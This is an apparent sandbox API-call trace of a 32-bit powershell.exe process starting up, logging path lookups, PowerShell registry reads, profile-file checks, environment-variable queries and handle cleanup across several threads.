	[0178.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.432] GetLastError () returned 0xcb
	[0178.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.432] GetLastError () returned 0xcb
	[0178.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.433] GetLastError () returned 0xcb
	[0178.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.566] GetLastError () returned 0xcb
	[0178.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.566] GetLastError () returned 0xcb
	[0178.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.566] GetLastError () returned 0xcb
	[0178.566] VirtualQuery (in: lpAddress=0x10d1b8, lpBuffer=0x10e1b8, dwLength=0x1c | out: lpBuffer=0x10e1b8*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.568] GetLastError () returned 0xcb
	[0178.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.568] GetLastError () returned 0xcb
	[0178.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dc3c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.568] GetLastError () returned 0xcb
	[0178.568] VirtualQuery (in: lpAddress=0x10d1b0, lpBuffer=0x10e1b0, dwLength=0x1c | out: lpBuffer=0x10e1b0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.568] VirtualQuery (in: lpAddress=0x10ce64, lpBuffer=0x10de64, dwLength=0x1c | out: lpBuffer=0x10de64*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.568] VirtualQuery (in: lpAddress=0x10ce64, lpBuffer=0x10de64, dwLength=0x1c | out: lpBuffer=0x10de64*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0178.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e8ec | out: phkResult=0x10e8ec*=0x31c) returned 0x0
	[0178.571] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e934, lpData=0x0, lpcbData=0x10e930*=0x0 | out: lpType=0x10e934*=0x1, lpData=0x0, lpcbData=0x10e930*=0x56) returned 0x0
	[0178.571] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e934, lpData=0x584bc0, lpcbData=0x10e930*=0x56 | out: lpType=0x10e934*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e930*=0x56) returned 0x0
	[0178.571] RegCloseKey (hKey=0x31c) returned 0x0
	[0178.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e8ec | out: phkResult=0x10e8ec*=0x31c) returned 0x0
	[0178.571] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e934, lpData=0x0, lpcbData=0x10e930*=0x0 | out: lpType=0x10e934*=0x1, lpData=0x0, lpcbData=0x10e930*=0x56) returned 0x0
	[0178.571] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e934, lpData=0x584bc0, lpcbData=0x10e930*=0x56 | out: lpType=0x10e934*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e930*=0x56) returned 0x0
	[0178.572] RegCloseKey (hKey=0x31c) returned 0x0
	[0178.573] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x584bc0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.574] GetLastError () returned 0x3f0
	[0178.574] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x584bc0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x10e484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.574] GetLastError () returned 0x3f0
	[0178.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0178.576] GetLastError () returned 0x3f0
	[0178.576] SetErrorMode (uMode=0x1) returned 0x1
	[0178.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10e99c | out: lpFileInformation=0x10e99c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.576] GetLastError () returned 0x2
	[0178.576] SetErrorMode (uMode=0x1) returned 0x1
	[0178.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0178.576] GetLastError () returned 0x2
	[0178.576] SetErrorMode (uMode=0x1) returned 0x1
	[0178.577] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10e99c | out: lpFileInformation=0x10e99c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.577] GetLastError () returned 0x2
	[0178.577] SetErrorMode (uMode=0x1) returned 0x1
	[0178.577] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x10e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0178.577] GetLastError () returned 0x2
	[0178.577] SetErrorMode (uMode=0x1) returned 0x1
	[0178.577] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10e99c | out: lpFileInformation=0x10e99c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.577] GetLastError () returned 0x3
	[0178.577] SetErrorMode (uMode=0x1) returned 0x1
	[0178.577] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x10e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0178.577] GetLastError () returned 0x3
	[0178.577] SetErrorMode (uMode=0x1) returned 0x1
	[0178.578] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x10e99c | out: lpFileInformation=0x10e99c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.578] GetLastError () returned 0x3
	[0178.578] SetErrorMode (uMode=0x1) returned 0x1
	[0178.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.580] GetLastError () returned 0xcb
	[0178.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.583] GetLastError () returned 0xcb
	[0178.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.588] GetLastError () returned 0xcb
	[0178.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.686] GetLastError () returned 0xcb
	[0178.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.688] GetLastError () returned 0xcb
	[0178.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.706] GetLastError () returned 0xcb
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c
	[0178.707] GetLastError () returned 0x0
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b0
	[0178.707] GetLastError () returned 0x0
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0178.707] GetLastError () returned 0x0
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e8
	[0178.707] GetLastError () returned 0x0
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2fc
	[0178.707] GetLastError () returned 0x0
	[0178.707] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x34c
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x358
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0178.708] GetLastError () returned 0x0
	[0178.708] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x364
	[0178.708] GetLastError () returned 0x0
	[0178.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.711] GetLastError () returned 0xcb
	[0178.715] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0178.715] GetLastError () returned 0xcb
	[0178.716] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x10e9dc | out: lpMode=0x10e9dc) returned 1
	[0178.808] GetLastError () returned 0xcb
	[0178.810] SetEvent (hEvent=0x1e8) returned 1
	[0178.810] GetLastError () returned 0xcb
	[0178.810] SetEvent (hEvent=0x31c) returned 1
	[0178.810] GetLastError () returned 0xcb
	[0178.810] SetEvent (hEvent=0x3b0) returned 1
	[0178.810] GetLastError () returned 0xcb
	[0178.810] SetEvent (hEvent=0x324) returned 1
	[0178.810] GetLastError () returned 0xcb
	[0178.810] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0178.811] GetLastError () returned 0x0
	[0178.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.812] GetLastError () returned 0xcb
	[0178.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e840 | out: phkResult=0x10e840*=0x36c) returned 0x0
	[0178.813] RegQueryValueExW (in: hKey=0x36c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10e888, lpData=0x0, lpcbData=0x10e884*=0x0 | out: lpType=0x10e888*=0x0, lpData=0x0, lpcbData=0x10e884*=0x0) returned 0x2

Thread:
	id = 95
	os_tid = 0xbd4


Thread:
	id = 96
	os_tid = 0xbe4


Thread:
	id = 99
	os_tid = 0x8f8


Thread:
	id = 101
	os_tid = 0xbd0


Thread:
	id = 102
	os_tid = 0x8e8

	[0091.140] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0152.351] LocalFree (hMem=0x5d70f8) returned 0x0
	[0152.351] GetLastError () returned 0x0
	[0152.351] CloseHandle (hObject=0x1e8) returned 1
	[0152.351] GetLastError () returned 0x0
	[0152.351] CloseHandle (hObject=0x13) returned 1
	[0152.352] GetLastError () returned 0x0
	[0152.352] CloseHandle (hObject=0xf) returned 1
	[0152.352] GetLastError () returned 0x0
	[0152.352] RegCloseKey (hKey=0x324) returned 0x0
	[0152.353] RegCloseKey (hKey=0x320) returned 0x0
	[0152.353] RegCloseKey (hKey=0x31c) returned 0x0
	[0152.353] LocalFree (hMem=0x5d6ea8) returned 0x0
	[0152.353] GetLastError () returned 0x0
	[0152.353] RegCloseKey (hKey=0x348) returned 0x0
	[0160.401] RegCloseKey (hKey=0x348) returned 0x0
	[0170.084] RegCloseKey (hKey=0x3c0) returned 0x0
	[0170.084] RegCloseKey (hKey=0x3a0) returned 0x0
	[0170.084] RegCloseKey (hKey=0x39c) returned 0x0
	[0170.085] RegCloseKey (hKey=0x398) returned 0x0
	[0170.085] RegCloseKey (hKey=0x394) returned 0x0
	[0170.085] RegCloseKey (hKey=0x390) returned 0x0
	[0170.085] RegCloseKey (hKey=0x38c) returned 0x0
	[0170.086] RegCloseKey (hKey=0x388) returned 0x0
	[0170.086] RegCloseKey (hKey=0x320) returned 0x0
	[0170.086] RegCloseKey (hKey=0x3bc) returned 0x0
	[0170.086] RegCloseKey (hKey=0x3b8) returned 0x0
	[0170.087] RegCloseKey (hKey=0x380) returned 0x0
	[0170.087] RegCloseKey (hKey=0x37c) returned 0x0
	[0170.087] RegCloseKey (hKey=0x378) returned 0x0
	[0170.088] RegCloseKey (hKey=0x374) returned 0x0
	[0170.088] RegCloseKey (hKey=0x370) returned 0x0
	[0170.088] RegCloseKey (hKey=0x36c) returned 0x0
	[0170.089] RegCloseKey (hKey=0x368) returned 0x0
	[0170.089] RegCloseKey (hKey=0x364) returned 0x0
	[0170.089] RegCloseKey (hKey=0x3b4) returned 0x0
	[0170.089] RegCloseKey (hKey=0x35c) returned 0x0
	[0170.090] RegCloseKey (hKey=0x358) returned 0x0
	[0170.090] RegCloseKey (hKey=0x354) returned 0x0
	[0170.090] RegCloseKey (hKey=0x350) returned 0x0
	[0170.091] RegCloseKey (hKey=0x34c) returned 0x0
	[0170.091] RegCloseKey (hKey=0x2fc) returned 0x0
	[0170.091] RegCloseKey (hKey=0x1e8) returned 0x0
	[0170.091] RegCloseKey (hKey=0x324) returned 0x0
	[0170.091] RegCloseKey (hKey=0x3b0) returned 0x0
	[0170.092] RegCloseKey (hKey=0x31c) returned 0x0
	[0170.092] RegCloseKey (hKey=0x348) returned 0x0
	[0170.092] RegCloseKey (hKey=0x3ac) returned 0x0
	[0170.092] RegCloseKey (hKey=0x3a8) returned 0x0
	[0170.093] RegCloseKey (hKey=0x384) returned 0x0
	[0179.254] RegCloseKey (hKey=0x36c) returned 0x0

Thread:
	id = 141
	os_tid = 0x5e4


Thread:
	id = 210
	os_tid = 0x6d8

	[0178.876] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0179.000] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0179.007] VirtualQuery (in: lpAddress=0x5f6e2c0, lpBuffer=0x5f6f2c0, dwLength=0x1c | out: lpBuffer=0x5f6f2c0*(BaseAddress=0x5f6e000, AllocationBase=0x55e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.012] GetLastError () returned 0xcb
	[0179.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.016] GetLastError () returned 0xcb
	[0179.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.018] GetLastError () returned 0xcb
	[0179.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.037] GetLastError () returned 0xcb
	[0179.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.152] GetLastError () returned 0xcb
	[0179.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.153] GetLastError () returned 0xcb
	[0179.187] VirtualQuery (in: lpAddress=0x5f6e3dc, lpBuffer=0x5f6f3dc, dwLength=0x1c | out: lpBuffer=0x5f6f3dc*(BaseAddress=0x5f6e000, AllocationBase=0x55e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.188] GetLastError () returned 0xcb
	[0179.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.191] GetLastError () returned 0xcb
	[0179.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.191] GetLastError () returned 0xcb
	[0179.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.245] GetLastError () returned 0xcb
	[0179.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.336] GetLastError () returned 0xcb
	[0179.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.662] GetLastError () returned 0xcb
	[0179.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.665] GetLastError () returned 0xcb
	[0179.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.752] GetLastError () returned 0xcb
	[0179.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.755] GetLastError () returned 0xcb
	[0179.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.757] GetLastError () returned 0xcb
	[0179.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.760] GetLastError () returned 0xcb
	[0179.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.762] GetLastError () returned 0xcb
	[0179.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628e48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.854] GetLastError () returned 0xcb
	[0180.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.235] GetLastError () returned 0xcb
	[0180.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.306] GetLastError () returned 0xcb
	[0180.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x628ea0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.310] GetLastError () returned 0xcb
	[0186.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5f6e884, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.279] GetLastError () returned 0xcb
	[0186.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5f6e838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.280] GetLastError () returned 0xcb
	[0186.367] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6301e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5f6e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0186.368] GetLastError () returned 0x0
	[0186.494] GetCurrentProcess () returned 0xffffffff
	[0186.494] GetLastError () returned 0x3f0
	[0186.494] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e9d0 | out: TokenHandle=0x5f6e9d0*=0x36c) returned 1
	[0186.494] GetLastError () returned 0x3f0
	[0186.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5f6e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0186.498] GetLastError () returned 0x0
	[0186.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5f6ea10 | out: lpFileInformation=0x5f6ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.500] GetLastError () returned 0x0
